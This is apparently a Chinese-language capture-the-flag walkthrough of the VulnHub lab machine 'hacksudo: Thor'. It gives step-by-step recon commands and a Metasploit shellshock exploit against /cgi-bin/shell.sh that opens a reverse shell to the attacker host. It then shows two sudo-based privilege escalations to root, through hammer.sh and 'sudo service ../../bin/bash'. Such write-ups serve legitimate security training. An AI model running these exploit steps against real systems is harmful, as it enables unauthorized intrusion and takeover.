靶机介绍
虚拟机链接:hacksudo: Thor ~ VulnHub
参考博客:Hacksudo Thor Walkthrough - Vulnhub - Security - NepCodeX
开始练习
本机ip:192.168.56.102
虚拟机ip:192.168.56.124
使用netdiscover寻找ip地址
netdiscover -r 192.168.56.0/24
使用nmap扫描开放端口
nmap -A 192.168.56.124
开放21,22,80端口,查看80端口
使用dirsearch枚举目录
dirsearch -e txt,bak,zip,img,jpg,php,html,js -u http://192.168.56.124
逐个查看,在news.php中发现提示cig-bin,根据博客提示这里有可能有漏洞可以利用,于是枚举该目录下文件,发现shell.sh
dirsearch http://192.168.56.124/cgi-bin
使用msf工具,成功获得shell
msfconsole
search shellshock
use 1
show options
set RHOSTS 192.168.56.124
set TARGETURI /cgi-bin/shell.sh
set LHOST 192.168.56.102
set LPORT 4396
run
shell
发现可以用thor的用户免密root执行hammer.sh
sudo -l
id
该shell文件可以执行输入的指令,于是使用“bash"获取thor的shell并优化
sudo -u thor /home/thor/./hammer.sh
bash
SHELL=/bin/bash script -q /dev/null ## 优化
sudo -l
可以直接利用该指令进行service提权
参考链接:service | GTFOBins
sudo service ../../bin/bash
成功提权